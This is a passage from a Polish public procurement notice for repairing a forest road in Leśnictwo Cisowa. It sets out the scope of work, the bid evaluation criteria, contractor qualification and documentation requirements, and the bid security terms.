rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: „Remont drogi leśnej nr inw. 713/242 w Leśnictwie Cisowa na odcinku od km 0+000 do km 3+200”, <br/>Zakres prac obejmuje:<br/><br/>a) Roboty przygotowawcze:<br/>- mechaniczne ścięcie zawyżonych poboczy – 3 200,0 m2<br/><br/>b) Wykonanie podbudowy:<br/>- wyrównanie istniejącej podbudowy kruszywem łamanym (uzupełnienie ubytków) – 135,75 m3<br/>- spulchnienie istniejącej podbudowy gruntofrezarką - 5 430,0 m2<br/>- profilowanie podbudowy równiarką – 5 430,0 m2<br/>- zagęszczenie podbudowy – 5 430,0 m2<br/>- zaklinowanie i miałowanie podbudowy wraz z zagęszczeniem – 5430,0 m2<br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór kosztorysu ofertowego, który stanowi załącznik <br/>nr 2.2 do SWZ.<br/>Zamawiający wymaga co najmniej 36 miesięcznej<br/>gwarancji i rękojmi na wykonany przedmiot zamówienia. Zgodnie z art. 95 ustawy Pzp<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy<br/>o pracę osób wykonujących roboty budowlane, związane z realizacją przedmiotu zamówienia: W<br/>odniesieniu do oby zadań częściowych, Zamawiający wymaga zatrudnienia przez wykonawcę<br/>lub podwykonawcę na warunkach umowy o pracę w rozumieniu ustawy Kodeks Pracy<br/>wszystkich osób realizujących przedmiot zamówienia za wyjątkiem osób wykonujących<br/>obowiązki kierownika budowy. Zamawiający nie wymaga, by na podstawie umowy<br/>o pracę zatrudniony był Wykonawca lub podwykonawca(y), będący osobą fizyczną, prowadzącą<br/>działalność gospodarczą, także w formie spółki cywilnej. Wymóg zatrudnienia osób na<br/>podstawie umowy o pracę, w dalszej części niniejszej SWZ oraz w pozostałych dokumentach<br/>dotyczących przedmiotowego zamówienia publicznego jest określany także jako: „Obowiązek<br/>zatrudnienia”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z<br/>przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o<br/>wartości do 50 % szacunkowej wartości zamówienia podstawowego w odniesieniu do obu zadań<br/>częściowych.2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących przedmiot<br/>zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub<br/>powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.3. Zamówienia, o których<br/>mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie<br/>zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający<br/>kierować się będzie następującymi kryteriami: 1) Cena – 60% – 2) Samodzielna realizacja zamówienia<br/>– 40%<br/>2. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się odbywać<br/>według zasad opisanych w dziale 16 ust. ust. 3. SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. W zakresie zdolności technicznej i zawodowej:<br/>1)	W zakresie doświadczenia<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał przynajmniej jedną robotę budowlaną rodzajem odpowiadającą przedmiotowi zamówienia (roboty w zakresie remontu dróg):, dla:<br/>Dla zadania częściowego nr 1 na wartość brutto minimum: 600 000 PLN.<br/>Dla zadania częściowego nr 2 na wartość brutto minimum: 45 000 PLN.<br/>W przypadku gdy wykonawca ubiega się o udzielenie zamówienia na więcej niż jednym zadaniu jednocześnie, winien wykazać spełnienie warunku doświadczenia w wymaganej ilości w odniesieniu do każdej oferowanej części osobno. Zamawiający dopuszcza jednak możliwość spełnienia niniejszego warunku poprzez wykazanie, że Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał przynajmniej jedną robotę budowlaną rodzajem odpowiadającą przedmiotowi zamówienia (roboty w zakresie remontu dróg) na wartości brutto minimum 645 000,00 PLN (kwota ta stanowi sumę wartości brutto wymagań w odniesieniu do wszystkich zadań częściowych).<br/>2)	W zakresie osób skierowanych do realizacji zamówienia<br/>Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: <br/>dla zadania częściowego nr 1: <br/>co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi <br/>w specjalności inżynieryjno-drogowej.<br/>Osoba ta powinna posiadać uprawnienia budowlane zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych <br/>w budownictwie (Dz.U. z 2019 r. poz. 831 z póź. zm.).<br/>Zamawiający uzna warunek za spełniony również w sytuacji, kiedy osoba ta posiada odpowiadające im uprawnienia wydane na podstawie poprzednio obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państwa Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz.U. z 2021 r. poz. 2351 z póź. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2021 r. poz. 1646 z póź. zm.).<br/><br/>dla zadania częściowego nr 2: <br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału <br/>w postępowaniu w odniesieniu do warunku dotyczącego osób skierowanych przez wykonawcę do realizacji zamówienia.<br/>3)	W zakresie dysponowania potencjałem technicznym<br/>Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować,:<br/>dla zadania częściowego nr 1 co najmniej: <br/>1 szt. spycharka, 1szt. równiarka, 1 szt. koparka podsiębierna jednonaczyniowa gąsienicowa o poj. łyżki min 0,4 m3, 1 szt. samochód samowyładowczy, 1 szt. układarka kruszywa, 1 szt. mieszarka do stabilizacji gruntu, 1 szt. walec wibracyjny gładki, 1 szt. walec ogumiony, 1 szt. zagęszczarka mechaniczna.<br/>dla zadań częściowych nr od 2 co najmniej:<br/>1 szt. spycharka lub równiarka, 1 szt. samochód samowyładowczy, 1 szt. gruntofrezarka, 1 szt. walec wibracyjny gładki, 1 szt. zagęszczarka mechaniczna.<br/>Jeżeli Wykonawca składa ofertę na więcej niż jedną część, zasoby sprzętowe potwierdzające spełnianie warunku mogą się powtarzać.<br/>3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>*Użyte wyżej pojęcia „stosowna sytuacja” oraz „odniesienie do konkretnego zamówienia lub jego<br/>części”, zgodnie z orzecznictwem TS oznacza „prawo do polegania, w przypadku konkretnego<br/>zamówienia, na zdolnościach innych podmiotów, niezależnie od charakteru łączących go z tymi<br/>podmiotami powiązań, o ile zostanie wykazane instytucji zamawiającej, że oferent będzie w<br/>rzeczywistości dysponował zasobami tych podmiotów, które to zasoby są niezbędne do<br/>wykonania tego zamówienia. (…) korzystanie z tego prawa może być ograniczone w<br/>szczególnych okolicznościach z uwagi na przedmiot danego zamówienia, a także jego cele. Jest<br/>tak w szczególności w przypadku, gdy oferent nie może polegać na zdolnościach podmiotu<br/>trzeciego niezbędnych do wykonania tego zamówienia, co oznacza, że może on powołać się na<br/>wskazane zdolności wyłącznie wtedy, gdy podmiot trzeci osobiście i bezpośrednio uczestniczy w<br/>wykonaniu odnośnego zamówienia.”<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>7. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, musi<br/>udowodnić Zamawiającemu, że realizując zamówienie, faktycznie będzie dysponował zasobami<br/>tych podmiotów, w szczególności przedstawiając ich zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>8. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu dotyczących zdolności technicznych lub zawodowych, a<br/>także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem Wykonawcy.<br/>9. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. Wykonawca nie może, po<br/>upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>10. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach lub oświadczeniach<br/>złożonych przez Wykonawców.<br/>11. Podane przez Wykonawcę lub przez podmiot udostępniający zasoby, w celu wykazania<br/>spełniania warunków udziału w postępowaniu, wartości zrealizowanych robót budowlanych w<br/>walutach innych niż złoty polski (PLN) będą przeliczane na PLN w oparciu o średni kurs NBP<br/>obowiązujący w dniu publikacji ogłoszenia o zamówieniu. Jeżeli w tym dniu kurs danej waluty<br/>nie był ogłaszany w NBP, obowiązuje kurs ogłoszony bezpośrednio przed dniem publikacji<br/>ogłoszenia o zamówieniu. Tabele kursów walut dostępne są pod następującym adresem<br/>internetowym:<br/>http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Podmiotowe środki dowodowe, które na wezwanie Zamawiającego<br/>zobowiązany będzie złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualne na dzień ich złożenia. W celu<br/>potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego Zamawiający żąda:<br/>a) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy<br/>Pzp oraz art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego (wzór oświadczenia stanowi załącznik nr 8 do SWZ);<br/>b) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 108 ust. 1 pkt 5 ustawy<br/>Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007<br/>r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który<br/>złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 89 do<br/>SWZ);<br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, że wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z oświadczeniem Zamawiający żąda złożenia oświadczenia, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności (wzór<br/>oświadczenia stanowi załącznik nr 9 do SWZ);<br/>d) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z<br/>oświadczeniem zamawiający żąda złożenia oświadczenia, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności (wzór<br/>oświadczenia stanowi załącznik nr 9 do SWZ);<br/>e) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie art. 109 ust. 1 pkt 4 ustawy<br/>(wzór oświadczenia stanowi załącznik nr 9 do SWZ);<br/>f) oświadczenia wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia z<br/>postępowania, o których mowa w:<br/>i) art. 108 ust. 1 pkt 3 ustawy,<br/>ii) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego,<br/>iii) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego<br/>na celu zakłócenie konkurencji,<br/>iv) art. 108 ust. 1 pkt 6 ustawy,<br/>v) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i<br/>opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych<br/>(Dz.U. z 2019 r. poz. 1170),<br/>vi) art. 109 ust. 1 pkt 5–10 ustawy.<br/>(wzór oświadczenia stanowi załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe, które na wezwanie Zamawiającego<br/>zobowiązany będzie złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualne na dzień ich złożenia.<br/>1) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej, Zamawiający żąda:<br/>a) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (liczonych<br/>wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty - w zakresie niezbędnym do wykazania spełniania<br/>warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 1) niniejszego SWZ (wzór wykazu<br/>stanowi załącznik nr 6 do SWZ);<br/>b) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w<br/>postępowaniu, określonego w rozdz. 5 ust. 2. pkt 2) niniejszego SWZ (dotyczy wyłącznie zadania<br/>częściowego nr 1 - wzór wykazu stanowi załącznik nr 7 do SWZ);<br/>c) Wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego<br/>wraz z informacją o podstawie do dysponowania tymi zasobami - w zakresie niezbędnym do<br/>wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 3)<br/>niniejszego SWZ (wzór wykazu stanowi załącznik nr 8 do SWZ).<br/>Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych lub usług<br/>wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w lit. a), dotyczy robót<br/>budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu,<br/>jako dokument tymczasowo zastępujący podmiotowe środki dowodowe.<br/>1) Do oferty każdy Wykonawca musi dołączyć „Oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu”, w zakresie wskazanym przez Zamawiającego<br/>odpowiednio w rozdziale 6 ust. 1 i ust. 2 oraz w rozdziale 5 ust. 2 pkt 1) i pkt 3) SWZ.<br/>Oświadczenie to stanowić będzie dowód, potwierdzający brak podstaw wykluczenia lub<br/>spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe (wzór oświadczenia stanowi<br/>załącznik nr 3 do SWZ).<br/>2) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, „Oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu”, o którym mowa w<br/>pkt 1), musi złożyć każdy z Wykonawców. Oświadczenia te mają potwierdzać brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz z oświadczeniem o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu, także „Oświadczenie o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu” podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków<br/>udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2. Inne dokumenty i oświadczenia składane wraz z ofertą. 1) W celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawcy ma<br/>obowiązek złożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.2) Jeżeli w imieniu Wykonawcy, Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby lub<br/>podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z powyższych dokumentów, należy złożyć<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby.Pełnomocnictwo powinno być złożone w oryginale lub w postaci<br/>cyfrowego odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej<br/>kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo notarialnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w wysokości: <br/>Dla zadania częściowego nr 1: 10 000.00 złotych<br/>Dla zadania częściowego nr 2: 750.00 złotych<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, gdy zawarto umowę (art. 98 ust. 1 pkt<br/>2 ustawy Pzp) albo unieważniono postępowanie (art. 98 ust. 1 pkt 3 ustawy Pzp) oraz złożono<br/>wniosek o zwrot wadium (art. 98 ust. 2 ustawy Pzp).<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019<br/>r. poz. 310, 836 i 1572).<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą.<br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w Banku<br/>BGŻ BNP Paribas S.A nr rachunku: 50 1600 1462 1016 7863 4000 0001, z dopiskiem na<br/>przelewie: „Wadium na zabezpieczenie oferty w postępowaniu - ZG.270.1.3.2021, Część: ____.”<br/>6. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych<br/>na rachunku bankowym Zamawiającego przed upływem terminu składania ofert (tj. przed<br/>upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>7. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie pieniądza dokument<br/>potwierdzający dokonanie przelewu wadium został złożony wraz z ofertą.<br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>9. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>10. Wadium wniesione w formie gwarancji lub poręczenia powinno w swej treści wskazywać<br/>Gwaranta/Poręczyciela, beneficjenta, termin obowiązywania, kwotę gwarancji oraz musi<br/>zawierać klauzulę o nieodwołalności oraz zapewnić bezwarunkową wypłatę przez Gwaranta<br/>(Poręczyciela) na pierwsze pisemne żądanie Zamawiającego pełnej kwoty.<br/>11. Oferta Wykonawcy, który nie wniesie wadium w wysokości określonej w ust. 1, w terminie<br/>określonym w ust. 2 lub w formie lub formach określonych w ust. 3, zostanie odrzucona.<br/>12. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia oraz dostarczenia wraz z ofertą następujących<br/>dokumentów:1. „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu”, o którym mowa w dziale 7 ust. 1 pkt 1) SWZ, musi złożyć każdy z Wykonawców.<br/>Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu (wzór oświadczenia stanowi załącznik nr 3 do SWZ).2. 